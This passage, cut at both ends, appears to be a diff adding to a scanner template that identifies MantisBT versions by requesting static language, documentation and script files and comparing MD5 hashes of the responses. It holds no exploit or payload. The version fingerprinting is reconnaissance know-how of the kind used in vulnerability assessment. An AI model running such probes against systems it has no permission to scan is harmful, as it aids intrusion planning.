1.3.1 + dsl: + - "(\"0d9f53aa0d8ccb1a0e5faa20b6683bee\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"88e10fa7775a140249c0902f55e90122\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"e1e9bd7bc91f9b21e66bbc7f2cd825a8\" == md5(body))" + - type: dsl + name: 1.2.6 + dsl: + - "(\"e1235a6797fa7086753f67b5477a6f86\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"047eefb265b9ceb20429f95d1beca707\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"8ca9cd1cd8d2f00821a836eb4b3958a5\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"95cfc257e61fb5eff12fd9fc3e4080af\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"a7c9f50e591ded48a8fa9998900daf72\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"0e7121e63266f40bb4d23179a3be8d19\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"700d1c69d4b1449ca1c7f4388c93a65f\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"90c7156cdd2019a190b674b115d83589\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_chinese_simplified.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.8.1 + dsl: + - "(\"32e481c7666f7d027bc69b4a678d4375\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"ae8eca3bc5665c7cc4f9c72b404eb084\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.4.2 + dsl: + - "(\"e84338a4a222e26a422ed56096ed6d84\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"332d4d5993cf571358934e586e5cb23e\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"20c1b742e09d5130266b2643078fd2c4\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"017bb522f85fb8652f9fd778c5483f10\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"9503fadccab5ae48912616fa7a4f6cb1\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"503a07e1d3400d021fbf7a02591cbd6c\" == md5(body))" + - type: dsl + 
name: 1.2.2 - 1.2.4 + dsl: + - "(\"4f72c9cf73f55ec3a9d40fdf3cd6a5fc\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"5813cc2f20ee2e4d4f63d42a79a6f1c6\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"a6aca7449d2436e75c5482dbcdf6620f\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"32cc8f9eceb5cee585309b13ea9fe77b\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"5cfcaad9ecf12a99947a40a92f77566a\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"6cf898789b6f72540125d8b62542c265\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"ebdb37ac8f25fdf19a000dcd800d4ae5\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.19.1 + dsl: + - "(\"e24a56ca424184273583558481da1289\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"91995ff323b85a49b2e9e5df395b9314\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"814a34ecf91711b9a5c1c436077c2d7d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_norwegian_bokmal.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.22.2 + dsl: + - "(\"a43b23a5d836233018c81ff77450aa41\" == md5(body))" + - type: dsl + name: 1.3.5 - 2.0.1 + dsl: + - "(\"f9f30b2ee55e5fe56acccddac6a23988\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.4 + dsl: + - "(\"f249adbc1e4c11b514b37b6af6c66626\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"9a6667381936e69e708dc94f4e83bf82\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"9c4324d4d4c82d00aaa3537806e93794\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"e305f72aba7a0a7e8f5a8d50733e2f5b\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"c3b697dece6abcd742a75e956a1da914\" == md5(body))" + - type: dsl + name: 1.2.15 - 1.2.16 + dsl: + - "(\"3bffcab2e42e2e261bd04193a1598a14\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"6cc540fd0d1a50676367331dea93ebe3\" == 
md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"88e7d14c59e2820ff0589284af6c5c3b\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"cd51b74ab6d02bbaabe75f976d2b3b32\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"b3fe7901bb63ebcc28b0b23886f15291\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"e49fcb1a57b4790bff224a76e9f6014b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"3b409ba6b5ff3c3d51851f7a5392c127\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_ripoarisch.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.22.2 + dsl: + - "(\"44b38ddd9ed17a880e4aa4250d571878\" == md5(body))" + - type: dsl + name: 1.3.2 - 2.0.1 + dsl: + - "(\"793ba1b0776c764e38bf31a5f243fd4a\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"4bf15e30376b2246c988a26002a37d88\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"cfafb013a8fa89b1469794795e2e99a1\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"66bb322d4ac9337299e97b6819322ef0\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"a45459be161030203da054f8b23847ab\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"5c9da80acd7114b74ba406bd592557f5\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"8f4ad1c717012483d6887846061882af\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"e622422236a7df456d0edae161e87f62\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"07d62d86e4dfd300bbf74714d64db427\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"3dfff5c3ce5269c140f02fb84b0ef2df\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"69c81f4bb97a54380e9c90840aea5a9e\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"50a92aa35a046d2f638ab0567199f344\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_croatian.txt" + + matchers: + - type: dsl + name: 2.0.0 - 
2.10.1 + dsl: + - "(\"0c89459d7f8d175849aee179ee338347\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"062f29a2eef5d3f0061745862b9684dc\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"8fb1504273b1c91df0487605e77392fa\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"cc196c5ecb5dbc6c52911cb1b6e57c0a\" == md5(body))" + - type: dsl + name: 1.2.1 - 1.2.4 + dsl: + - "(\"95b34672236b6cbe8de49cc52cd2f4f4\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"e456a13e2e4b5f5fa2d25b7b085d9514\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"f1c4ae9657af235c4a950ab47337cd13\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"b5732a332f1aabb126cf06bd74a109eb\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"9115c33132dfcedda8015530268597de\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"16118ce1c54c2d71c97e9dcabd06dd60\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.9 + dsl: + - "(\"7bbb3789a285135d49062edc2a6e9635\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"40f41c60e4758e472d35a3b003917529\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"12d39949783fd43bf6dc23457ab20d29\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"6ac73a41372370c2a2726aff881d32e2\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"a94bfaa5d8c5f0ab4c89f9679972f733\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.19.1 + dsl: + - "(\"82171ef6ddbef4ffe7bf3dedd41ce62d\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"99662d69f2577c670b84fb14b4f2f582\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"90f72d695a3bb61b1b15326996f18898\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"27486804b391f19520b3714dcf28893e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_portuguese_standard.txt" + + 
matchers: + - type: dsl + name: 1.3.0 - 2.9.1 + dsl: + - "(\"1429e34cc66323464b05382e2ef40c1b\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"3b6569f08e6cbf76145840027e2bea49\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"2d287698e658ba9aaec84e4d98254abb\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"ba884b47a5d732ede87093ba0674bd4a\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"6ae933337821771ef20c72e492fc40e7\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"3fe02a6e3264873872aed4a1a328ada8\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"78ecd829c5628c3aedcf7ed86e1f8b88\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"cf9d937fd160e1cbdaa5e0d68fb0bc69\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"8afd7b789fd93df7cf26a39c19972ba9\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"b8e283bca972fe788f3d3f4eaeb19e72\" == md5(body))" + - type: dsl + name: 2.10.0 - 2.21.3 + dsl: + - "(\"a6a6cbba99dfb07a4a4c1ab51e6956d9\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"c62025a44db68174fe85e0c044b7d835\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_spanish.txt" + + matchers: + - type: dsl + name: 1.3.5 - 2.9.1 + dsl: + - "(\"fb7b220ea907065983208b6720f78033\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"89b703190e5c169d9c0de44badd15c22\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"7d2f01db6af04e5906a6dad0fef736e4\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"9ceb47b77d428c7aa2cf19e3d3be70f6\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"92214f5721f51134c1becedf29204ac3\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"d2ba35b897f3cf879a4998902c73f58f\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - 
"(\"1c60a09f59fbbc7b10cc1d2bedf03190\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"c27d91075396ab960fbbe5cdfd0bf43f\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"30f1e62c016b9cf21eaa400cc87a5b48\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"abaa04e3e74b54e3336e7cb025bbd87f\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"99c4549cad7940f0a9489eef9ed64621\" == md5(body))" + - type: dsl + name: 2.10.0 - 2.24.3 + dsl: + - "(\"04be43c6b8459f3b1f944ad0330e75d8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/configuration.sgml" + + matchers: + - type: dsl + name: 1.2.20 + dsl: + - "(\"9609c929da0242becf0655ce329ae2dc\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.19 + dsl: + - "(\"b71606fc60091f76434494a68a7e87f9\" == md5(body))" + - type: dsl + name: 1.2.16 - 1.2.17 + dsl: + - "(\"5dd2b5cd2bcc936dea54edb24a10cb14\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"5bd72a28721379d89476f38392ba66ac\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"15b91f0a2486a71074a5465d29c79c4e\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"ba4791786556f689974b3fd38ee77393\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/installation.sgml" + + matchers: + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"472ebb31a0ce9f0f42cdbfd0e5e1616a\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"bdd3a14790070f83b72fd5934dbbd4ea\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"b651993253641e77a7d4ece62d9e2ab7\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"8ef451851c5ae15895f6a74a8adada42\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"8d28d867b9e1a706adac517178c9c58b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/INSTALL" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - 
"(\"161de47e93a2f9ce7f3d76950837e6bf\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"24d00e95780e23407f643fb8e2900d5b\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"afed810c01fb3433ee3f653a79f3084c\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"bda5bcd2d701306435293b5059768be7\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"ac8607b8eb510cf5f6378ec0db2d5335\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.2 + dsl: + - "(\"329e19fb73554599e44215513a8a644a\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"fe68ab9f0d1856686ca4e87adc13a4cd\" == md5(body))" + - type: dsl + name: 1.1.1 - 1.1.9 + dsl: + - "(\"7ad732cf4cf2c54d445b0d5bdba94089\" == md5(body))" + - type: dsl + name: 1.1.0 + dsl: + - "(\"af0287d07100cffe37514b047d2a11e8\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"8ad7233951e59c8a3bd9c2c25db49084\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.5 + dsl: + - "(\"ec42e1170405f9abbf440c719430ef98\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_german.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"2a85c13974e47d7fc1f367b8f5cf8d04\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"ef41ee6944f3ae5e9ace0ff9011440f3\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"568cec42e8cd6a5f9253f424ce68ee33\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"044ffa50ffd946d67a06495900314593\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"24297ee7df5d612ac09d69c26b48096b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"a3eaaf0e6a4845ac255a93f2b3b903f3\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"d33e5be8169c2f68d80d2f41eda28d5c\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"c51c0a8afa58312014f81d64a84c856b\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - 
"(\"4aeac09b2449c78266840998d98d39c3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_chinese_traditional.txt" + + matchers: + - type: dsl + name: 2.4.0 - 2.24.3 + dsl: + - "(\"886b094928f9b485a567d1b7c5ec938c\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.3.3 + dsl: + - "(\"cc9ea370d9d67791034113ff24c4d428\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"cb9209a278fcc19d8c8b06ac067591b3\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"8261615939c38e72f9ff37ad2781cfbb\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"9ede31687e6428fa7fdb4e271e52ad5c\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"7f6e40abebc5a5e946bd0164302d45ba\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"457ebd85387603adcf9776a253d2a9b9\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"70be9ca2d1dba874a801e95e88dfcd92\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"633d011a14a05f591365564cae6c8556\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_interlingua.txt" + + matchers: + - type: dsl + name: 1.3.5 - 2.24.3 + dsl: + - "(\"a4a1c3e375134fa75f8e1d748bc82e48\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.4 + dsl: + - "(\"178ac8b7659b018ca753fe778270d06e\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"ec76fe729957f6ec65934755cc0e4670\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"55a7edadc33240bc3680c89b3876cc84\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"31413933e27aaf985ccdbec87518386d\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"0be58462cbfd25f17f5eb320aa45c91e\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"1f203d95961be920a1d35422afe1c8f9\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"871081460dacb92cf6aa8bb599c0cd9f\" == md5(body))" + - type: dsl + name: 
1.2.11 + dsl: + - "(\"8e72cd39a65880df82ae876b1fc30741\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_chinese_simplified.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"d4b95f7206340859c05eadb4b09db8fc\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"167ca84cd407d368fcc362de6bc93723\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"8e645123dfa21dfa753f1f2b8acfd227\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"ca5c941aec5f32ab475e09ab7f769dc9\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"f95a98fc678410084ca17ba1e2e38d88\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"549da4508ecfeeced4b994fb232cc9a7\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"a1313dd898983a8c7ff0a0c2e2b9abce\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"75a6b443eb041f56a7134962ed19da72\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"6036b5965740723e21134db383bad1a9\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"db006465822e32349297bc1a2abf6cf2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_swedish.txt" + + matchers: + - type: dsl + name: 2.5.0 - 2.24.3 + dsl: + - "(\"c3adce0ee425db4a065ca55d7b79311b\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.4.2 + dsl: + - "(\"7aae97f0d785c789a2e34beec99d28bb\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"d72e1b705e98a3a744ed71486c2b5d7a\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"ce9475094b6f2958f054d5f8797be064\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"57d30442a9eedc832803d59365c70872\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"2940d9247adde80df5edea6f5ecf7dc4\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"47f43dedffeb86b9aa68c7d2f7f9d6fd\" == 
md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"5c5ed2254680c5e75244b55acabd09f5\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"a767e57348715535cbcea4249e57f829\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_ripoarisch.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"4a6c990b9591d89c7bfd3375789846c8\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"7e72bc84a97b04fe223c0b37d7770826\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"0a5a6ebf2684b555fc9289d74016ceff\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"49bdcda37cc0b88abe198ca79d266d96\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"b391de0d8facd52464e1a2bffd2f4d5b\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"d05007ea8bd29057c83fbeabb9b0180e\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"4e57fe3ff196c71e4fdc21c250582e22\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"2030a0dc3a0adbd92d255aea79c7a14b\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"98842ffbd581b46758c433a7552bfb9e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_spanish.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.24.3 + dsl: + - "(\"b8bf8986a10291922594cfb4a9e70c5d\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.5.2 + dsl: + - "(\"7f70cd0715fec09d7dfdf16e76a2806e\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"897a88f3cf777385d4c52abef06aa842\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"71bc3f732c80e9caed15d6102496d101\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"8bb8f4918993f34e6c0baaf35a6b978b\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"d07bacd8f26a71db4dafae86a4d15c5b\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - 
"(\"fd992238c1783ea27d972718d2a74c5a\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"6704c19c8ee28995b843953f331ea5dc\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"1c45013a11d56b0df5ee727a27e428e2\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"177014221c096d132a413d17a0a8cb28\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"a09364f40c293dc93939bc14c696265e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_korean.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.13.2 + dsl: + - "(\"b7a5f5bc64f730daa539ea51b482b2f4\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"629e4a5646069ae7b27085e18192b1d4\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"0a57b55d5574d86c77959a8ebf0d2c14\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"22971da1bc6a143ffaae1226c325396d\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"863fcc51ed0027311ebf8745a76bcd73\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"5316fc7077ff7ed1920d9152b5bb7f03\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"5890392a0ebf0cf492d6b4264cfab88e\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"9b7231defc0103e8cec5b0bffdd7e31c\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"a506bbbdba6eea66b81f3f8d94753626\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.19.1 + dsl: + - "(\"82c851ae554fa2e9793b86ce2f1558bc\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"49633915c2d868692caa53930c802273\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"8a1b98fcdbd783ca604cc2b0cd3ddd58\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_swedish.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.19.1 + dsl: + - "(\"70b0083e8afc55d38e16e862c8a737e8\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + 
- "(\"1bc0c4c9ef13db6d612e57acd7196b3a\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.4.2 + dsl: + - "(\"3ddfbc4180532d9edb83d82425145d2b\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"a44333b51d44ec46bc07575cba561ba9\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"2f0ec6d5e382551d30bf853a758d9b94\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"d342d92fe2fc78d68a82db8a0a4ec0d9\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"0c1a53d42af08c0ba18fa8dac7855bd4\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"d3ad78dbe41b060a0f3869b44faa05c0\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"56055630a1e2bb46c5afdaed184a2db6\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"002a86852e5160ab2ea8ff351943f317\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"8113365bdac7af1b0b3bff1303813b4e\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"376b645b4d895f56dea9f401ed41de16\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"7aa903541937ef60cc94c17fa891731f\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"a43e52f448bc7ecfa9cb5d30f6bacb36\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"c21fd8285ec0c0b413629c5460fbe074\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"6037a3df1ae8557a0cd1c2487237ad4b\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"ea2760873f10b4a3f017c247028cfe3b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"a49305a237ad45ff98eb8f912f5af646\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/install.js" + + matchers: + - type: dsl + name: 2.5.0 - 2.22.2 + dsl: + - "(\"f026b1fe8211b613642a82a0f3e2e9f4\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.4.2 + dsl: + - "(\"86ed962bdcccaa80de92d04ab348420b\" == md5(body))" + - 